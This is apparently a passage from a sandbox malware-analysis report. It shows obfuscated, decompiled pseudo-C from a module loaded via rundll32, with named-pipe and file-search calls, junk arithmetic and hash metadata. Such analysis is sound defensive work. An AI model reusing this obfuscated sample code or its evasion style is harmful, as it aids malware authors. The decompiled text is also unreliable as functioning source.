                				r14d = r14d * ( *(__rdx + 0x480) ^  *(__rdx + 0x448));
                				_t639 = r9d;
                				r8d = r8d * ( *((intOrPtr*)(__rdx + 0x3a0)) - 0x000016ce | 0x00000bbb);
                				 *(_t724 + 0x28) =  *((intOrPtr*)(__rdx + 0x138)) -  *(__rdx + 0x70) &  *(__rdx + 0x2c8);
                				 *(_t724 + 0xe8) = r8d;
                				r8d = r8d | r12d;
                				r8d = r8d -  *(__rdx + 0x410);
                				 *(_t724 + 0x20) = ( *(__rdx + 0x90) ^ _t639) *  *(__rdx + 0xd0);
                				InitializeCriticalSection(_t751);
                				r9d =  *(__rdx + 0x108);
                				r8d =  *(__rdx + 0xb0);
                				 *(_t724 + 0xe8) =  *(_t724 + 0xe8) ^ ( *(__rdx + 0x450) & r13d) + 0x00001320;
                				_t459 =  *(_t724 + 0xd0);
                				 *(__rdx + 0x250) =  *(__rdx + 0x250) ^ ( *(__rdx + 0x108) | _t639);
                				_t526 = _t525 - (r9d | 0x00001515);
                				 *((intOrPtr*)(__rdx + 0x110)) =  *((intOrPtr*)(__rdx + 0x110)) - ( *(_t724 + 0xc0) |  *(__rdx + 0x340));
                				_t518 =  *(_t724 + 0xb0) - ( *(__rdx + 0x480) | r14d |  *(_t724 + 0xb0));
                				 *(__rdx + 0x240) =  *(__rdx + 0x240) +  *((intOrPtr*)(__rdx + 0x300)) +  *((intOrPtr*)(__rdx + 0x418));
                				 *(_t724 + 0xb0) = _t518;
                				 *(_t724 + 0xc0) = _t496 ^ r14d ^ _t518;
                				 *(__rdx + 0x360) =  *(__rdx + 0x360) |  *((intOrPtr*)(__rdx + 0x2f8)) -  *((intOrPtr*)(_t724 + 0x60)) - 0x00001b47;
                				r8d = r8d &  *(__rdx + 0x240);
                				r11d =  *(__rdx + 0x188);
                				r8d = r8d | _t459;
                				r11d = r11d -  *(__rdx + 0x478);
                				r10d =  *(__rdx + 0x70);
                				r10d = r10d *  *(_t724 + 0xb0);
                				r11d = r11d * r9d;
                				r9d =  *(__rdx + 0xd0);
                				r9d = r9d ^  *(_t724 + 0xc0);
                				 *(_t724 + 0x40) = 0x1fda;
                				r9d = r9d ^ 0x00001320;
                				 *((intOrPtr*)(_t724 + 0x38)) =  *((intOrPtr*)(__rdx + 0x2e0)) - r14d;
                				 *(_t724 + 0x30) = r9d;
                				 *(_t724 + 0x28) = r10d;
                				 *(_t724 + 0x20) = r11d;
                				_t451 = E00007FFA7FFA535F6E94(_t459,  *(__rdx + 0x2a8) ^ _t459 | _t518,  *((intOrPtr*)(__rdx + 0x48)) + _t526 & _t459, _t639,  *(_t724 + 0xc0),  *((intOrPtr*)(__rdx + 0x2a0)), __rdx, __rdx,  *((intOrPtr*)(__rdx + 0x138)) -  *(__rdx + 0x70) &  *(__rdx + 0x2c8));
                				r9d = _t451;
                				r8d =  *(_t724 + 0xe8);
                				 *(_t724 + 0xb0) = _t451;
                				 *(__rdx + 0x230) =  *(__rdx + 0x230) * ( *((intOrPtr*)(__rdx + 0x178)) +  *(_t724 + 0x58));
                				r8d = r8d ^ r15d & _t526;
                				r14d = r14d |  *((intOrPtr*)(__rdx + 0x390)) - _t459;
                				if (0x655 - ( *(__rdx + 0x1a8) ^  *(__rdx + 0x478) ^  *(__rdx + 0x28)) > 0) goto 0x535f81a3;
                				r14d = r14d &  *(_t724 + 0xc0);
                				r14d = r14d & 0x00000bbb;
                				 *((intOrPtr*)(__rdx + 0x298)) =  *((intOrPtr*)(__rdx + 0x298)) - ( *(__rdx + 0x128) & r15d) *  *(__rdx + 0x1b0);
                				 *(__rdx + 0x248) =  *(__rdx + 0x248) -  *(__rdx + 0x410) *  *(_t724 + 0x58);
                				ConnectNamedPipe(_t749);
                				 *(__rdx + 0x4b8) =  *(__rdx + 0x4b8) | ( *(__rdx + 0x470) ^  *(__rdx + 0x140)) * 0x00001355;
                				 *((intOrPtr*)(__rdx + 0x320)) =  *((intOrPtr*)(__rdx + 0x320)) + ( *(__rdx + 0xa0) & r12d);
                				 *((intOrPtr*)(__rdx + 0x168)) =  *((intOrPtr*)(__rdx + 0x168)) - ((_t526 |  *(__rdx + 0x248)) &  *(__rdx + 0x70));
                				goto 0x535f84d3;
                				r12d = r12d | 0x00001ad7;
                				return _t526 + r12d;
                			}


                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ConnectCriticalInitializeNamedPipeSection
                • String ID:
                • API String ID: 3855124782-0
                • Opcode ID: fbf5cef5fb0f43e424f0a94a9ef42a50e7aabed04e205ea09c7ff64d780cb3fc
                • Instruction ID: 85e14e36f0efd5a3e8e60e5816fedd36d61ac4f084f8fce2450afecb0f743bfa
                • Opcode Fuzzy Hash: fbf5cef5fb0f43e424f0a94a9ef42a50e7aabed04e205ea09c7ff64d780cb3fc
                • Instruction Fuzzy Hash: 685200B2315A84ABDB5CCF29D6947A9B7A5F788B84F04512ACB6E43750CF35E1B0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E00007FFA7FFA535F9404(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __ebp, signed long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r10) {
                				signed int _t352;
                				signed int _t360;
                				long long _t387;
                				long long _t399;
                				signed long long _t411;
                				long long _t419;
                				long long _t437;
                				signed long long _t454;
                				signed long long _t456;
                				void* _t459;
                				intOrPtr _t489;
                				long _t526;
                				long long _t527;
                				long long _t529;
                				long long _t531;
                				void* _t533;
                				void* _t534;
                				signed long long _t537;
                				void* _t538;
                				void* _t541;
                				long _t542;
                				long _t544;
                				CHAR* _t547;
                				CHAR* _t549;
                
                				_t529 = __rsi;
                				_t456 = __rbx;
                				_t541 = _t533;
                				 *((long long*)(_t541 + 8)) = __rbx;
                				 *((long long*)(_t541 + 0x10)) = _t531;
                				 *((long long*)(_t541 + 0x18)) = __rsi;
                				_t534 = _t533 - 0x30;
                				r14d = __rdx - 0xfb;
                				r15d =  *(_t534 + 0x88);
                				_t360 =  *(_t534 + 0xc8) + 0xfffffd8e;
                				r10d =  *((intOrPtr*)(_t534 + 0xd0));
                				r15d = r15d + 0x679;
                				r9d =  *(_t534 + 0x80);
                				r8d = _t459 + 0x883;
                				_t527 =  *((intOrPtr*)(_t534 + 0xa8));
                				r9d = r9d + 0xffffe026;
                				 *(_t534 + 0xc8) = r8d;
                				 *(_t534 + 0x88) = r9d;
                				 *((intOrPtr*)(_t534 + 0xc0)) =  *((intOrPtr*)(_t534 + 0xa0)) + 0xffffe7e1;
                				r12d = __r10 - 0x16ce;
                				if (r9d - _t459 - 0x641 >= 0) goto 0x535f9a23;
                				 *( *(_t527 + 0x468)) =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x1b0) ^ 0x50747a9d;
                				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x1b0)) + 0x41634f98;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x108)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250));
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250)) + 1;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x298)) - ( *(_t527 + 0x300) | 0x000012ad);
                				 *((long long*)(_t527 + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x238)) - 0xc92;
                				( *(_t527 + 0x468))[2] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x70)) + 0x65724fdd;
                				 *((long long*)( *(_t527 + 0x110) + 0x28)) =  *((intOrPtr*)( *(_t527 + 0x110) + 0x398));
                				 *((long long*)( *(_t527 + 0x110) + 0x398)) =  *((long long*)( *(_t527 + 0x110) + 0x398)) + 1;
                				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 8) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 8) |  *(_t527 + 0x4b0) | 0x000016ce;
                				if (r9d - r10d > 0) goto 0x535f9c09;
                				 *((long long*)(_t541 - 0x38)) = _t527;
                				r8d = 0xc92;
                				r9d = 0x1ba7;
                				( *(_t527 + 0x468))[3] =  *( *((intOrPtr*)(_t527 + 0x160)) + 0x68) ^ 0x000066f1;
                				_t387 =  *((intOrPtr*)(_t527 + 0x2a0));
                				 *( *(_t527 + 0x110) + 0x248) =  *( *(_t527 + 0x110) + 0x248) ^ ( *(_t387 + 0x50) | 0x0000181f);
                				E00007FFA7FFA535E10A8(0x1ec0, 0x1320, 0x1ba7, __rbx,  *(_t387 + 0x50) | 0x0000181f, __rsi, __r8, _t538, _t541);
                				r13d = 0x1487;
                				 *((long long*)(_t527 + 0x3e0)) = _t387;
                				 *( *((intOrPtr*)(_t527 + 0x358)) + 0x158) =  *( *((intOrPtr*)(_t527 + 0x358)) + 0x158) ^  *( *(_t527 + 0x240) + 0x170) * 0x00001515;
                				 *((intOrPtr*)( *(_t527 + 0x110) + 0xb0)) =  *((intOrPtr*)( *(_t527 + 0x110) + 0xb0)) + ( *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x370) ^ _t456);
                				 *( *(_t527 + 0x468)) =  *((intOrPtr*)(_t527 + 0x340)) + 0x64615d5b;
                				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x5d8) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x5d8) * 0x1ec0;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x5e0)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x5e0)) + 0xffffc972;
                				( *(_t527 + 0x468))[1] =  *((intOrPtr*)(_t527 + 0x70)) + 0x726254c5;
                				( *(_t527 + 0x468))[2] =  *((intOrPtr*)(_t527 + 0x340)) + 0x41796070;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x1a8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x1b0)) - _t544;
                				( *(_t527 + 0x468))[3] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x70)) - r13d;
                				_t399 =  *((intOrPtr*)(_t527 + 0x20));
                				 *((intOrPtr*)(_t399 + 0x398)) =  *((intOrPtr*)(_t399 + 0x398)) + _t529;
                				 *((intOrPtr*)(_t527 + 0x3e0))();
                				 *((long long*)(_t527 + 0x3e8)) = _t399;
                				 *( *(_t527 + 0x468)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x70)) + 0x6c645fe7;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x2f8)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x2f8)) + 0x1fef;
                				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x148)) + 0x6c641b17;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0xd0)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0xd0)) -  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248));
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248)) + 1;
                				 *( *(_t527 + 0x110) + 0x3a0) =  *( *(_t527 + 0x110) + 0x3a0) ^  *( *(_t527 + 0x110) + 0x250);
                				 *( *(_t527 + 0x110) + 0x250) =  *( *(_t527 + 0x110) + 0x250) + 1;
                				( *(_t527 + 0x468))[2] =  *(_t527 + 0x68) - 0x1516;
                				_t411 =  *(_t527 + 0x110) + 0x3d0;
                				 *( *((intOrPtr*)(_t527 + 0x160)) + 0x390) =  *( *((intOrPtr*)(_t527 + 0x160)) + 0x390) | _t411;
                				 *((intOrPtr*)(_t527 + 0x3e8))();
                				 *(_t527 + 0x4a8) = _t411;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x3b8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x3b8)) + ( *( *((intOrPtr*)(_t527 + 0x108)) + 0x140) | 0x00001ad7);
                				 *( *(_t527 + 0x468)) =  *(_t527 + 0x68) ^ 0x704f61cc;
                				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x340)) + 0x69465c74;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x90)) + 0xffffecab -  *((intOrPtr*)( *(_t527 + 0x110) + 0x28));
                				_t419 =  *(_t527 + 0x468);
                				 *((intOrPtr*)(_t419 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x340)) + 0x537b;
                				 *((intOrPtr*)(_t527 + 0x3e0))();
                				r8d = 0x11f1;
                				 *((long long*)(_t527 + 0x280)) = _t419;
                				 *( *(_t527 + 0x468)) =  *(_t527 + 0x2a8) ^ 0x7243555a;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x360)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x360)) + 0xffffe13f;
                				 *((long long*)( *(_t527 + 0x110) + 0x330)) =  *((intOrPtr*)( *(_t527 + 0x240) + 0x88)) - __r8;
                				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x70)) + 0x65744cde;
                				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x3a0) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x3a0) |  *( *((intOrPtr*)(_t527 + 0x160)) + 0x480) | _t544;
                				( *(_t527 + 0x468))[2] =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x68) ^ 0x746370d1;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x88)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x88)) + 0xffffe932 -  *((intOrPtr*)( *(_t527 + 0x110) + 0x370));
                				_t489 =  *((intOrPtr*)(_t527 + 0x5e8));
                				 *(_t527 + 0x3b8) =  *(_t527 + 0x3b8) ^  *(_t489 + 0x140);
                				 *(_t489 + 0x140) =  *(_t489 + 0x140) + 1;
                				( *(_t527 + 0x468))[3] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x2a8)) + 0x6e4e55;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x3c8)) +  *((intOrPtr*)(_t527 + 0x128));
                				 *((long long*)(_t527 + 0x128)) =  *((long long*)(_t527 + 0x128)) - 1;
                				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x320)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x320)) +  *(_t527 + 0x68) - __r8;
                				_t437 =  *((intOrPtr*)(_t527 + 0x20));
                				 *(_t437 + 0x300) =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x3c0) * 0x1ad7;
                				 *((intOrPtr*)(_t527 + 0x3e0))();
                				 *((long long*)(_t527 + 0x288)) = _t437;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x1a8)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x1a8)) + 0x47d;
                				_t352 = ("n greasy sledge automatically indeed hut convinced ant specialist ours business overlook dungeon feral fowls spiders rate frosty covering brutally numerals waving huge wedge broadcasting fill cow faithful intelligent having laden beat cowardly episode maturity rage outcry health curiosity alternate awe revolve abode deduction contributor invitation donkey humour elinor outlet hols am edit criminal arrested lick example museum beauty walter recover cattle soap conform inhabited guarded improvement ladder tighten intrude arrow practiced declaration lustre actually stare active crackle closing " & 0x000000ff) + 0x1fda;
                				 *( *(_t527 + 0x468)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x340)) + 0x614d625d;
                				 *((long long*)( *((intOrPtr*)(_t527 + 0x108)) + 0x300)) = _t527 + 0x1d8;
                				goto 0x535f9c09;
                				if (_t360 - ( *(_t527 + 0x378) | r15d) < 0) goto 0x535f9a7b;
                				r13d = 0x1487;
                				 *((long long*)(_t527 + 0x70)) =  *((intOrPtr*)(_t527 + 0x108)) - _t352 + 0x1582;
                				r8d = r8d ^ (r12d * 0x0000157a | r13d);
                				 *(_t534 + 0xc8) = r8d;
                				r15d = r15d *  *(_t527 + 0x1b0) * 0x10ae;
                				goto 0x535f9a86;
                				r12d = r12d | 0x00001ba7 * _t352 | r15d;
                				if ( *((intOrPtr*)(_t527 + 0x188)) != (r14d |  *(_t527 + 0x240))) goto 0x535f9c09;
                				if (_t360 -  &(_t547[_t531]) < 0) goto 0x535f9bba;
                				r11d =  *(_t527 + 0x110);
                				_t537 = _t352;
                				 *((intOrPtr*)(_t527 + 0xd8)) =  *((intOrPtr*)(_t527 + 0xd8)) - ( *(_t527 + 0x48) | _t537 | 0x000016ce);
                				r9d =  *(_t534 + 0xc8) & 0x0000ffff;
                				 *(_t534 + 0x28) = (0x00001ba7 | r14d) * r9d;
                				 *(_t527 + 0x88) = r9d -  *((intOrPtr*)(_t527 + 0x370)) | (r12d | _t360) ^  *(_t527 + 0x88);
                				 *(_t534 + 0x20) =  *(_t527 + 0x470) * 0xc92;
                				 *(_t527 + 0x3c8) =  *(_t527 + 0x3c8) * ( *(_t527 + 0x40) & 0x00001ba7);
                				r8d =  *(_t527 + 0x368) & 0x0000ffff;
                				 *(_t527 + 0x2e8) =  *(_t527 + 0x2e8) |  *(_t527 + 0x80) | _t537;
                				r9w = r9w ^ 0x00001569;
                				r8d = r8d * 0x145c;
                				r8w = r8w + 0x1ba7;
                				FindFirstFileA(_t549);
                				CreateNamedPipeA(_t547, _t544, _t542, _t526);
                				r9d =  *(_t534 + 0x88);
                				_t454 = r15d;
                				 *(_t527 + 0x398) =  *(_t527 + 0x398) |  *(_t527 + 0x90) & _t454 ^ 0x00001c76;
                				r13d = r13d + 2;
                				r14d = r14d * ( *(_t527 + 0x190) &  *(_t527 + 0x110) ^ 0x00000c92);
                				 *((intOrPtr*)(_t527 + 0x2a0)) =  *((intOrPtr*)(_t527 + 0x2a0)) - _t454;
                				if (r13d == (r14d |  *(_t527 + 0x240))) goto 0x535f9aa0;
                				return  *((intOrPtr*)(_t534 + 0xb0)) + 0xfffff241;
                			}


                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CreateFileFindFirstNamedPipe
                • String ID:
                • API String ID: 2637045871-0
                • Opcode ID: 96c448f786fee3ab4a5cb4a9ce212ff12ab756ea6c6bd8a169a82929cda45701
                • Instruction ID: 463418028934b7bac54ec60e0666ec190a9fb3c8bc6cb0eb84be7bbdcd3a7a3f
                • Opcode Fuzzy Hash: 96c448f786fee3ab4a5cb4a9ce212ff12ab756ea6c6bd8a169a82929cda45701
                • Instruction Fuzzy Hash: 1022F176704B84A7CB4DCB29DA943A9B7A4F389B84F05822ADB6E47760DF34E171C704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00007FFA7FFA535EBD48(void* __edx, long long __rbx, long long __rcx, signed long long* __rdx, long long __rdi, long long __rsi, signed int* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, signed int* _a48, intOrPtr _a56) {
                				signed int _t145;
                				signed int _t149;
                				signed int _t153;
                				signed int _t157;
                				signed char _t166;
                				signed int _t179;
                				signed int _t215;
                				void* _t218;
                				signed long long _t237;
                				signed long long _t238;
                				signed int* _t263;
                				signed int* _t264;
                				signed int* _t265;
                				signed long long _t269;
                				signed int* _t272;
                				signed int _t276;
                				signed int* _t280;
                				long _t282;
                				void* _t285;
                
                				_t218 = _t285;
                				 *((long long*)(_t218 + 0x10)) = __rbx;
                				 *((long long*)(_t218 + 0x18)) = __rsi;
                				 *((long long*)(_t218 + 0x20)) = __rdi;
                				 *((long long*)(_t218 + 8)) = __rcx;
                				 *((intOrPtr*)(__rcx + 4)) = 0;
                				_a8[2] = 0;
                				_a8[3] = 0;
                				if ((r8b & 0x00000010) == 0) goto 0x535ebd94;
                				_a8[1] = _a8[1] | 0x00000001;
                				if ((r8b & 0x00000002) == 0) goto 0x535ebda7;
                				_a8[1] = _a8[1] | 0x00000002;
                				if ((r8b & 0x00000001) == 0) goto 0x535ebdba;
                				_a8[1] = _a8[1] | 0x00000004;
                				if ((r8b & 0x00000004) == 0) goto 0x535ebdcd;
                				_a8[1] = _a8[1] | 0x00000008;
                				if ((r8b & 0x00000008) == 0) goto 0x535ebde0;
                				_a8[1] = _a8[1] | 0x00000010;
                				_t263 = _a8;
                				_t149 = ( !(_t145 << 4) ^  *(_t263 + 8)) & 0x00000010;
                				 *(_t263 + 8) =  *(_t263 + 8) ^ _t149;
                				_t264 = _a8;
                				_t153 = ( !(_t149 << 3) ^  *(_t264 + 8)) & 0x00000008;
                				 *(_t264 + 8) =  *(_t264 + 8) ^ _t153;
                				_t265 = _a8;
                				_t157 = ( !(_t153 << 2) ^  *(_t265 + 8)) & 0x00000004;
                				 *(_t265 + 8) =  *(_t265 + 8) ^ _t157;
                				_a8[2] = _a8[2] ^ ( !(_t157 + _t157) ^ _a8[2]) & 0x00000002;
                				_a8[2] = _a8[2] ^ ( !( *__rdx) ^ _a8[2]) & 0x00000001;
                				_t166 = E00007FFA7FFA535EC23C( *__rdx >> 0xb >> 0xc);
                				if ((_t166 & 0x00000001) == 0) goto 0x535ebe6c;
                				_a8[3] = _a8[3] | 0x00000010;
                				if ((_t166 & 0x00000004) == 0) goto 0x535ebe78;
                				_t269 = _a8;
                				 *(_t269 + 0xc) =  *(_t269 + 0xc) | 0x00000008;
                				if ((_t166 & 0x00000008) == 0) goto 0x535ebe84;
                				_a8[3] = _a8[3] | 0x00000004;
                				if (0 == 0) goto 0x535ebe91;
                				_a8[3] = _a8[3] | 0x00000002;
                				if (0 == 0) goto 0x535ebe9e;
                				_t237 = _a8;
                				 *(_t237 + 0xc) =  *(_t237 + 0xc) | 0x00000001;
                				_t238 = _t237 & _t269;
                				if (0 == 0) goto 0x535ebee8;
                				if (_t238 == 0x2000) goto 0x535ebed8;
                				if (_t238 == 0x4000) goto 0x535ebec8;
                				if (_t238 != _t269) goto 0x535ebeef;
                				 *_a8 =  *_a8 | 0x00000003;
                				goto 0x535ebeef;
                				 *_a8 =  *_a8 & 0xfffffffe;
                				 *_a8 =  *_a8 | 0x00000002;
                				goto 0x535ebeef;
                				 *_a8 =  *_a8 & 0xfffffffd;
                				 *_a8 =  *_a8 | 0x00000001;
                				goto 0x535ebeef;
                				 *_a8 =  *_a8 & 0xfffffffc;
                				 *_a8 =  *_a8 & 0xfffe001f;
                				 *_a8 =  *_a8 | (r9d & 0x00000fff) << 0x00000005;
                				_t280 = _a48;
                				_a8[8] = _a8[8] | 0x00000001;
                				if (_a56 == 0) goto 0x535ebf4d;
                				_a8[8] = _a8[8] & 0xffffffe1;
                				_a8[4] =  *_a40;
                				_a8[0x18] = _a8[0x18] | 0x00000001;
                				_a8[0x18] = _a8[0x18] & 0xffffffe1;
                				_a8[0x14] =  *_t280;
                				goto 0x535ebf95;
                				r8d = 0xffffffe3;
                				_a8[8] = _a8[8] & r8d | 0x00000002;
                				_a8[4] =  *_a40;
                				_a8[0x18] = _a8[0x18] | 0x00000001;
                				_a8[0x18] = _a8[0x18] & r8d | 0x00000002;
                				_t276 =  *_t280;
                				_a8[0x14] = _t276;
                				E00007FFA7FFA535EC180(_a8);
                				_t122 = _t276 + 1; // 0x1
                				r8d = _t122;
                				RaiseException(_t282, ??, ??);
                				_t272 = _a8;
                				if ((_t272[2] & 0x00000010) == 0) goto 0x535ebfbb;
                				asm("dec eax");
                				if ((_t272[2] & 0x00000008) == 0) goto 0x535ebfc6;
                				asm("dec eax");
                				if ((_t272[2] & 0x00000004) == 0) goto 0x535ebfd1;
                				asm("dec eax");
                				if ((_t272[2] & 0x00000002) == 0) goto 0x535ebfdc;
                				asm("dec eax");
                				_t215 = _t272[2] & 0x00000001;
                				if (_t215 == 0) goto 0x535ebfe7;
                				asm("dec eax");
                				if (_t215 == 0) goto 0x535ec01e;
                				if (_t215 == 0) goto 0x535ec012;
                				if (_t215 == 0) goto 0x535ec006;
                				if (( *_t272 & 0x00000003) != 1) goto 0x535ec025;
                				 *__rdx =  *__rdx | 0x00006000;
                				goto 0x535ec025;
                				asm("dec eax");
                				asm("dec eax");
                				goto 0x535ec025;
                				asm("dec eax");
                				asm("dec eax");
                				goto 0x535ec025;
                				 *__rdx =  *__rdx & 0xffff9fff;
                				if (_a56 == 0) goto 0x535ec032;
                				_t179 = _t272[0x14];
                				 *_t280 = _t179;
                				goto 0x535ec039;
                				 *_t280 = _t272[0x14];
                				return _t179;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionRaise_clrfp
                • String ID:
                • API String ID: 15204871-0
                • Opcode ID: 1ac256271ec7e779de7012907d652dde8f9598f36a7378bd05bc035ebf56baba
                • Instruction ID: 5ebaa9ed102033b12d794667b787d37211e9b8a39d9564af0ce6c90eb56673cb
                • Opcode Fuzzy Hash: 1ac256271ec7e779de7012907d652dde8f9598f36a7378bd05bc035ebf56baba
                • Instruction Fuzzy Hash: E1B18A73624B888EEB19CF29C84636C3BA1FB85B48F19D861DB6D837A4CB39D451C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 56%
                			E00007FFA7FFA535F8C00(void* __ecx, void* __ebp, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r10) {
                				signed int _t96;
                				signed int _t120;
                				signed int _t125;
                				signed long long _t135;
                				signed long long _t139;
                				intOrPtr _t167;
                				void* _t169;
                				signed long long _t186;
                				signed long long _t189;
                				void* _t190;
                				long long _t194;
                				void* _t196;
                				void* _t197;
                				signed long long _t200;
                				signed int _t203;
                				void* _t205;
                				struct _CRITICAL_SECTION* _t209;
                				void* _t211;
                
                				 *((long long*)(_t196 + 8)) = __rbx;
                				 *((long long*)(_t196 + 0x10)) = _t194;
                				 *((long long*)(_t196 + 0x18)) = __rsi;
                				_push(_t190);
                				_t197 = _t196 - 0x20;
                				r11d =  *((intOrPtr*)(_t197 + 0x70));
                				r15d = __rdx - 0x1ad7;
                				r14d =  *((intOrPtr*)(_t197 + 0x80));
                				r9d = __rdx - 0x4da;
                				r13d =  *(_t197 + 0x98);
                				_t120 = __r8 + 8;
                				_t167 =  *((intOrPtr*)(_t197 + 0x88));
                				r11d = r11d + 0x3d9;
                				r10d = _t169 + 0x83;
                				r14d = r14d + 0xffffe9db;
                				r13d = r13d + 0xfffff6aa;
                				if (r11d == __r8 + 0x83) goto 0x535f8eda;
                				if (r13d - __r9 - 0xe8 > 0) goto 0x535f8d88;
                				_t96 = _t190 + 0x7b;
                				if (r9d != _t96) goto 0x535f8d28;
                				r14d = r14d + 0xf31;
                				 *((intOrPtr*)(_t167 + 0x600)) = 0x11aab8;
                				_t125 = _t169 + 0x62d - 0x720;
                				 *(_t167 + 0x458) = _t96 / ( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x2a0)) + 0x68)) - 0x157e);
                				 *((intOrPtr*)(_t167 + 0x604)) = 0x144;
